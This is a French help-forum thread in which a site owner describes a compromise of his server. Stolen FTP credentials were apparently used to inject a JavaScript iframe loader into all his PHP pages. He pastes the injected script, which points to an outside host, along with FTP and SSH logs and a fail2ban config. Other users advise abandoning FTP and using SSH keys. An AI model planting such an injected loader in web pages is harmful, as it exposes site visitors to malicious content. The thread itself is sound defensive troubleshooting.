Attaque bruteforce en cours

[torrgovin]

Salut à tous,

J'ai récemment remarqué qu'un malin avait rajouté du code sur toutes mes pages PHP.

Code : Tout sélectionner

/*68c8c7*/
  (function () {
    var id = '90';
    var ny09 = document.createElement('iframe');
    ny09.src = 'http://rekar.at/clk.php';
    ny09.style.position = 'absolute';
    ny09.style.border = '1';
    ny09.style.height = '31px';
    ny09.style.width = '42px';
    ny09.style.left = '500px';
    ny09.style.top = '100px';

    if (!document.getElementById('ny')) {
        document.write('<style>body{overflow-x:hidden;}</style>');
        document.write('<div id=\'ny\' style="position:absolute; width:80%; height:100%;" ></div>');
        document.getElementById('ny').appendChild(ny09);
    }
})();
/*/68c8c7*/

Vu le nombre de pages qui ont été modifié, j'ai vite compris que le mec n'avait pas pu faire ça à la main et mes doutes se sont confirmés en consultant les logs de mon serveur ftp.

Code : Tout sélectionner

Sun Mar  3 19:55:02 2013 [pid 1010] CONNECT: Client "151.141.90.51"
Sun Mar  3 19:55:03 2013 [pid 1009] [odysseetransfer] OK LOGIN: Client "151.141.90.51"
Sun Mar  3 19:55:07 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/sitemap.xml", 4791 bytes,$
Sun Mar  3 19:55:12 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/blog-taxi/wp-config.php",$
Sun Mar  3 19:56:07 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/en/sitemap.xml", 4731 byt$
Sun Mar  3 19:57:33 2013 [pid 1011] [odysseetransfer] OK UPLOAD: Client "151.141.90.51", "//kXdq693m.gif", 10 bytes, 0$
Sun Mar  3 19:57:36 2013 [pid 1011] [odysseetransfer] OK DELETE: Client "151.141.90.51", "//kXdq693m.gif"
Sun Mar  3 19:57:37 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "//index.php", 7378 bytes, $
Sun Mar  3 19:57:39 2013 [pid 1011] [odysseetransfer] OK UPLOAD: Client "151.141.90.51", "//index.php", 8841 bytes, 13$
Sun Mar  3 19:57:40 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/404.html", 1107 bytes, 6.$
Sun Mar  3 19:57:42 2013 [pid 1011] [odysseetransfer] OK UPLOAD: Client "151.141.90.51", "/404.html", 2053 bytes, 2.88$
Sun Mar  3 19:57:43 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/index.php", 8841 bytes, 1$
Sun Mar  3 19:57:44 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/requete.html", 818 bytes,$
Sun Mar  3 19:57:45 2013 [pid 1011] [odysseetransfer] OK UPLOAD: Client "151.141.90.51", "/requete.html", 1764 bytes, $
Sun Mar  3 19:57:46 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/blog-taxi/wp-content/them$
Sun Mar  3 19:57:48 2013 [pid 1011] [odysseetransfer] OK UPLOAD: Client "151.141.90.51", "/blog-taxi/wp-content/themes$
Sun Mar  3 19:57:49 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/blog-taxi/wp-content/them$
Sun Mar  3 19:57:51 2013 [pid 1011] [odysseetransfer] OK UPLOAD: Client "151.141.90.51", "/blog-taxi/wp-content/themes$
Sun Mar  3 19:57:52 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/commande/index.php", 7061$
Sun Mar  3 19:57:53 2013 [pid 1011] [odysseetransfer] OK UPLOAD: Client "151.141.90.51", "/commande/index.php", 8524 b$
Sun Mar  3 19:57:55 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/commande/dropbox/OLD2/ind$
Sun Mar  3 19:57:56 2013 [pid 1011] [odysseetransfer] OK UPLOAD: Client "151.141.90.51", "/commande/dropbox/OLD2/index$
Sun Mar  3 19:57:57 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/commande/old/dropbox/inde$
Sun Mar  3 19:57:59 2013 [pid 1011] [odysseetransfer] OK UPLOAD: Client "151.141.90.51", "/commande/old/dropbox/index.$
Sun Mar  3 19:58:00 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/depenses/ajaxfileupload.j$
Sun Mar  3 19:58:02 2013 [pid 1011] [odysseetransfer] OK UPLOAD: Client "151.141.90.51", "/depenses/ajaxfileupload.js"$
Sun Mar  3 19:58:03 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/en/404.html", 1107 bytes,$
Sun Mar  3 19:58:04 2013 [pid 1011] [odysseetransfer] OK UPLOAD: Client "151.141.90.51", "/en/404.html", 2053 bytes, 3$
Sun Mar  3 19:58:05 2013 [pid 1011] [odysseetransfer] OK DOWNLOAD: Client "151.141.90.51", "/en/index.php", 6379 bytes$

Il s'avère qu'il avait donc déjà les accès de mon serveur FTP.

Le plus étonnant c'est que mon mot de passe contenait un caractère spécial, qui certes, n'est pas le plus aboutie en terme de sécurité, mais qui était moyen d'après moi.

En consultant des logs plus vieux, j'ai vu que mon serveur subissait depuis février des tentatives de connexions par centaines et pire. Une fois le mot de passe FTP obtenu il s'est aussi connecté en SSH car il y avait marqué que la dernière connexion était du domaine einstein.etsu.edu.

Voici ce que j'ai fais pour commencer :

- Changer les mots de passes
- Utiliser tcp_wrappers pour bloquer toutes les IP sur le service FTP et n'autoriser que la mienne et j'ai rajouté la ligne dans hosts.deny "ALL : PARANOID"
- Remettre une copie propre de mon site web

Est-ce ok de ce côté là pour le FTP ?

Ensuite j'ai consulté le fichier log Auth.log : A quoi correspond ce fichier log ?

En me penchant dessus, j'ai remarqué qu'au moment même ou je vous écris, il y a des tentatives de connexion par centaine, voici son contenu :

Code : Tout sélectionner

sMar  5 13:46:59 ks29582 sshd[4378]: Failed password for invalid user mark from 61.186.249.148 port 48155 ssh2
Mar  5 13:47:01 ks29582 CRON[4382]: pam_unix(cron:session): session opened for user root by (uid=0)
Mar  5 13:47:01 ks29582 CRON[4382]: pam_unix(cron:session): session closed for user root
Mar  5 13:47:02 ks29582 sshd[4380]: Invalid user mark from 61.186.249.148
Mar  5 13:47:02 ks29582 sshd[4380]: pam_unix(sshd:auth): check pass; user unknown
Mar  5 13:47:02 ks29582 sshd[4380]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=mai$
Mar  5 13:47:04 ks29582 sshd[4380]: Failed password for invalid user mark from 61.186.249.148 port 48319 ssh2
Mar  5 13:47:06 ks29582 sshd[4425]: Invalid user mark from 61.186.249.148
Mar  5 13:47:06 ks29582 sshd[4425]: pam_unix(sshd:auth): check pass; user unknown
Mar  5 13:47:06 ks29582 sshd[4425]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=mai$
Mar  5 13:47:09 ks29582 sshd[4425]: Failed password for invalid user mark from 61.186.249.148 port 48484 ssh2
Mar  5 13:47:12 ks29582 sshd[4427]: Invalid user mark from 61.186.249.148
Mar  5 13:47:12 ks29582 sshd[4427]: pam_unix(sshd:auth): check pass; user unknown
Mar  5 13:47:12 ks29582 sshd[4427]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=mai$
Mar  5 13:47:13 ks29582 sshd[4427]: Failed password for invalid user mark from 61.186.249.148 port 48660 ssh2
Mar  5 13:47:16 ks29582 sshd[4429]: Invalid user mark from 61.186.249.148

Il s'avère qu'il y aussi des tentatives de connexions en ce moment même. Je comptais installer Fail2Ban mais l'IP depuis laquelle les attaques proviennent changent souvent et donc Fail2ban risque d'être inefficace. Que faire ??

Merci pour votre aide les gars,
A+

EDIT : Je viens de voir que Fail2Ban était déjà installé... Il est donc vraiment inefficace ?

Code : Tout sélectionner

[ssh]
enabled = true
port    = ssh
filter  = sshd
logpath  = /var/log/auth.log
maxretry = 6

[captnfab]

Salut torrgovin,

FTP comporte de nombreuses failles de sécurité, notamment le fait que par défaut, les mots de passe sont transmis en clair.

Avec ssh, le protocole est réellement sécurisé. Mais il faut effectivement installer fail2ban pour se prémunir des attaques bruteforce. Il me semble que l'installation par défaut n'est pas mauvaise, mais tu peux toujours la rendre plus stricte en modifiant la configuration.

Si tu veux éviter tout risque de bruteforce, utilise une paire de clé privée/publique ssh au format rsa.
Sur une Debian ou ses dérivées, tu peux la générer avec ssh-keygen.

Il faut savoir que pour réussir un bruteforce, il faut tenter des centaines de milliers de tentatives. Si fail2ban ne ban qu'après 10 ou 15 tentatives, ça n'est pas grave, il faut quand même des dizaines de milliers d'IP à l'utilisateur malveillant.

Enfin, je ne sais pas quel serveur FTP tu utilisais (FTP est absolument à proscrire sauf pour le partage public et sans authentification), mais peut-être que Fail2Ban n'était pas configuré pour fonctionner avec lui. Ou peut-être que comme je le disais il n'y a pas eu besoin de bruteforce, si le mot de passe a été intercepté alors qu'il était en clair.

[torrgovin]

Salut Captnfab, Merci pour ta réponse.

Non je n'utilise pas ftp mais vsftpd.

Mais je viens de remarquer que lorsque j'ai tapé la commande apt-get install Fail2Ban, il l'a mis a jour et j'ai l'impression que ça commence à faire effet.

Code : Tout sélectionner

2013-03-05 16:32:00,015 fail2ban.server : INFO   Changed logging target to /var$
2013-03-05 16:32:00,015 fail2ban.jail   : INFO   Creating new jail 'ssh'
2013-03-05 16:32:00,015 fail2ban.jail   : INFO   Jail 'ssh' uses poller
2013-03-05 16:32:00,042 fail2ban.filter : INFO   Added logfile = /var/log/auth.$
2013-03-05 16:32:00,042 fail2ban.filter : INFO   Set maxRetry = 6
2013-03-05 16:32:00,044 fail2ban.filter : INFO   Set findtime = 600
2013-03-05 16:32:00,044 fail2ban.actions: INFO   Set banTime = 600
2013-03-05 16:32:00,140 fail2ban.jail   : INFO   Jail 'ssh' started

et une IP de bloquée, UNE !!

Code : Tout sélectionner

2013-03-05 17:34:13,344 fail2ban.actions: WARNING [ssh] Ban 201.231.232.212

Si tu veux éviter tout risque de bruteforce, utilise une paire de clé privée/publique ssh au format rsa.
Sur une Debian ou ses dérivées, tu peux la générer avec ssh-keygen.

As-tu un tuto qui explique en détails cette partie ? Sinon je vais chercher un tuto.

Merci !

[captnfab]

vsftp est un serveur FTP, et il est donc vulnérable aux failles du protocole FTP

Tu as un tuto ici sur les bases de ssh et la génération de clés : http://wiki.debian-facile.org/config:ssh

[torrgovin]

Ah oui caremment ?! Un protocole aussi répandu qui présente des failles ?! Quelle est la solution à ce problème ? Sftp ?

Merci pour le lien

EDIT : Purée mais je vais devenir FOU !! Le mec a reussi à retrouver mon mot de passe FTP même après changement ! avec chiffre, lettres et un caractère spécial !

On voit bien qu'il a fait plusieurs tentatives et qu'il a reussi à trouver le bon mot de passe mais le tcp_wrapper a fait son boulot.

Code : Tout sélectionner

Tue Mar  5 13:44:38 2013 [pid 4222] CONNECT: Client "37.161.219.205", "Connection refused: tcp_wrappers denial."
Tue Mar  5 13:44:44 2013 [pid 4226] CONNECT: Client "37.161.219.205", "Connection refused: tcp_wrappers denial."
Tue Mar  5 13:44:49 2013 [pid 4230] CONNECT: Client "37.161.219.205", "Connection refused: tcp_wrappers denial."
Tue Mar  5 15:21:06 2013 [pid 8788] CONNECT: Client "37.161.219.205", "Connection refused: tcp_wrappers denial."
Tue Mar  5 15:21:11 2013 [pid 8790] CONNECT: Client "37.161.219.205", "Connection refused: tcp_wrappers denial."
Tue Mar  5 15:47:52 2013 [pid 11274] CONNECT: Client "37.161.219.205"
Tue Mar  5 15:47:55 2013 [pid 11273] [odysseetransfer] FAIL LOGIN: Client "37.161.219.205"
Tue Mar  5 15:48:17 2013 [pid 11319] CONNECT: Client "37.161.219.205"
Tue Mar  5 15:48:19 2013 [pid 11318] [odysseetransfer] FAIL LOGIN: Client "37.161.219.205"
Tue Mar  5 15:48:28 2013 [pid 11321] CONNECT: Client "37.161.219.205"
Tue Mar  5 15:48:30 2013 [pid 11320] [odysseetransfer] FAIL LOGIN: Client "37.161.219.205"
Tue Mar  5 15:49:10 2013 [pid 11368] CONNECT: Client "37.161.219.205"
Tue Mar  5 15:49:10 2013 [pid 11367] [odysseetransfer] OK LOGIN: Client "37.161.219.205"
Tue Mar  5 17:46:58 2013 [pid 23086] CONNECT: Client "79.190.0.59", "Connection refused: tcp_wrappers denial."
Tue Mar  5 17:46:58 2013 [pid 23088] CONNECT: Client "79.190.0.59", "Connection refused: tcp_wrappers denial."
Tue Mar  5 17:46:59 2013 [pid 23090] CONNECT: Client "79.190.0.59", "Connection refused: tcp_wrappers denial."
Tue Mar  5 17:47:19 2013 [pid 23136] CONNECT: Client "79.190.0.59", "Connection refused: tcp_wrappers denial."
Tue Mar  5 17:47:21 2013 [pid 23140] CONNECT: Client "87.106.14.166", "Connection refused: tcp_wrappers denial."
Tue Mar  5 17:47:21 2013 [pid 23142] CONNECT: Client "87.106.14.166", "Connection refused: tcp_wrappers denial."
Tue Mar  5 17:47:21 2013 [pid 23144] CONNECT: Client "87.106.14.166", "Connection refused: tcp_wrappers denial."
Tue Mar  5 17:47:43 2013 [pid 23147] CONNECT: Client "87.106.14.166", "Connection refused: tcp_wrappers denial."
Tue Mar  5 17:49:08 2013 [pid 23240] CONNECT: Client "80.87.36.13", "Connection refused: tcp_wrappers denial."
Tue Mar  5 17:49:08 2013 [pid 23242] CONNECT: Client "80.87.36.13", "Connection refused: tcp_wrappers denial."
Tue Mar  5 17:49:09 2013 [pid 23244] CONNECT: Client "80.87.36.13", "Connection refused: tcp_wrappers denial."

Que dois-je faire de plus pour arrêter ça ?

[captnfab]

FTP était très répendu dans les années… 90 ? Aujourd'hui, plus personne de censé ne l'utilise (On vit dans un monde de fou, moi j'vous l'dit )

Il y a un risque pour que ton serveur ftp comporte une faille de sécurité. La seule vraie solution est de le supprimer complètement. Tu pourras toujours uploader tes fichiers via une connexion ssh avec scp ou filezilla.

Ensuite, s'il trouve même tes mots de passe ssh, là le problème sera plus grave (corruption de ton serveur ou de ta machine personnelle).

[torrgovin]

Très bien, je vais voir pour transférer les fichiers en SSH mais j'aurais bien voulu connaître cette faille qu'ils exploitent parce que j'en ai pleins des amis qui stockent des fichiers sur FTP et si je leur dis qu'il y a une faille ils ne vont jamais me croire .

Sinon je pourrais peut-être désactiver le service FTP quand je n'en ai pas besoin.

Le Sftp c'est la même chose que le SSH ?

En tout cas merci pour ton aide.

[captnfab]

Oui : http://fr.wikipedia.org/wiki/SSH_file_transfer_protocol

Pour la faille, je ne sais pas. Peut-être est-ce simplement ton voisin si tu as un réseau en WEP ou en WPA1-PSK

[Malekal_morte]

Salut,

A lire aussi :
http://forum.malekal.com/hack-web-site- ... 22837.html
https://www.malekal.com/2012/07/18/psw- ... -de-sites/